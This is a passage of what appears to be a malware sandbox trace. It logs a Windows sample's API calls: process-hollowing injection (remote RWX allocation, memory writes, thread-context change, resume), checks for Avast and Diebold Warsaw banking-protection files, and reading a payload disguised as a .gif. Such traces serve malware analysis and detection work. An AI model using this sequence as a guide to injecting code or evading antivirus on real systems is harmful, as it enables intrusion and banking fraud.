[212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0230.469] ReadProcessMemory (in: hProcess=0x154, lpBaseAddress=0x7ffd6008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0230.469] VirtualAllocEx (hProcess=0x154, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0230.469] VirtualAlloc (lpAddress=0x1e1c000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e1c000
[0230.475] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x400000, lpBuffer=0x1e19294*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1e19294*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0230.485] WriteProcessMemory (in: hProcess=0x154, lpBaseAddress=0x7ffd6008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0230.485] SetThreadContext (hThread=0x158, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fbf0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0230.486] ResumeThread (hThread=0x158) returned 0x1
[0230.521] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0230.521] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.521] GlobalUnlock (hMem=0x189000c) returned 0
[0230.521] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0230.521] GlobalUnlock (hMem=0x1890004) returned 0
[0230.527] Sleep (dwMilliseconds=0xe74e)
[0240.545] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0240.546] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0240.546] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0240.546] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0240.546] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160
[0240.546] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0240.546] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0240.546] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0240.546] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0240.548] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0240.548] ReadFile (in: hFile=0x160, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0240.550] CloseHandle (hObject=0x160) returned 1
[0240.550] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.551] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.551] GlobalUnlock (hMem=0x189000c) returned 0
[0240.551] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0240.551] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.551] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.551] GlobalUnlock (hMem=0x189000c) returned 0
[0240.551] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0240.552] GlobalLock (hMem=0x189000c) returned 0x25f110
[0240.553] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0240.553] GlobalUnlock (hMem=0x189000c) returned 0
[0240.553] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0240.553] GlobalLock (hMem=0x189000c) returned 0x265120
[0240.554] GlobalHandle (pMem=0x265120) returned 0x189000c
[0240.554] GlobalUnlock (hMem=0x189000c) returned 0
[0240.554] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0240.554] GlobalLock (hMem=0x189000c) returned 0x265120
[0240.555] GlobalHandle (pMem=0x265120) returned 0x189000c
[0240.555] GlobalUnlock (hMem=0x189000c) returned 0
[0240.555] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0240.555] GlobalLock (hMem=0x189000c) returned 0x26f130
[0240.556] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0240.556] GlobalUnlock (hMem=0x189000c) returned 0
[0240.556] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0240.556] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.557] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.557] GlobalUnlock (hMem=0x189000c) returned 0
[0240.557] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0240.557] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.558] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.558] GlobalUnlock (hMem=0x189000c) returned 0
[0240.558] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0240.558] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.559] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.559] GlobalUnlock (hMem=0x189000c) returned 0
[0240.559] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0240.559] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.559] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.559] GlobalUnlock (hMem=0x189000c) returned 0
[0240.559] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0240.559] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.560] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.560] GlobalUnlock (hMem=0x189000c) returned 0
[0240.560] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0240.560] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.561] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.561] GlobalUnlock (hMem=0x189000c) returned 0
[0240.561] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0240.561] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.561] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.561] GlobalUnlock (hMem=0x189000c) returned 0
[0240.561] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0240.562] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.562] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.562] GlobalUnlock (hMem=0x189000c) returned 0
[0240.562] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0240.562] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.563] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.563] GlobalUnlock (hMem=0x189000c) returned 0
[0240.563] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0240.563] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.564] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.564] GlobalUnlock (hMem=0x189000c) returned 0
[0240.564] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0240.565] GlobalLock (hMem=0x189000c) returned 0x27b110
[0240.566] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0240.566] GlobalUnlock (hMem=0x189000c) returned 0
[0240.566] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0240.566] GlobalLock (hMem=0x189000c) returned 0x27b110
[0240.566] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0240.566] GlobalUnlock (hMem=0x189000c) returned 0
[0240.566] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0240.568] GlobalLock (hMem=0x189000c) returned 0x29f120
[0240.568] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0240.568] GlobalUnlock (hMem=0x189000c) returned 0
[0240.568] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0240.568] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.569] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.569] GlobalUnlock (hMem=0x189000c) returned 0
[0240.569] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0240.569] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.570] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.570] GlobalUnlock (hMem=0x189000c) returned 0
[0240.570] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0240.570] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.571] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.571] GlobalUnlock (hMem=0x189000c) returned 0
[0240.571] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0240.571] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.571] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.571] GlobalUnlock (hMem=0x189000c) returned 0
[0240.571] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0240.571] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.572] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.572] GlobalUnlock (hMem=0x189000c) returned 0
[0240.572] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0240.572] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.573] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.573] GlobalUnlock (hMem=0x189000c) returned 0
[0240.573] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0240.573] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.573] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.573] GlobalUnlock (hMem=0x189000c) returned 0
[0240.573] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0240.573] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.574] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.574] GlobalUnlock (hMem=0x189000c) returned 0
[0240.574] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0240.574] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.575] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.575] GlobalUnlock (hMem=0x189000c) returned 0
[0240.575] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0240.575] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.576] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.576] GlobalUnlock (hMem=0x189000c) returned 0
[0240.576] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0240.576] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.577] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.577] GlobalUnlock (hMem=0x189000c) returned 0
[0240.577] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0240.577] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.577] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.577] GlobalUnlock (hMem=0x189000c) returned 0
[0240.577] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0240.577] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.578] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.578] GlobalUnlock (hMem=0x189000c) returned 0
[0240.578] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0240.578] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.579] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.579] GlobalUnlock (hMem=0x189000c) returned 0
[0240.579] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0240.579] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.579] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.580] GlobalUnlock (hMem=0x189000c) returned 0
[0240.580] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0240.580] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.580] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.580] GlobalUnlock (hMem=0x189000c) returned 0
[0240.580] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0240.580] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.581] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.581] GlobalUnlock (hMem=0x189000c) returned 0
[0240.581] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0240.581] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.582] GlobalHandle (pMem=0x25b100) returned 0x189000c
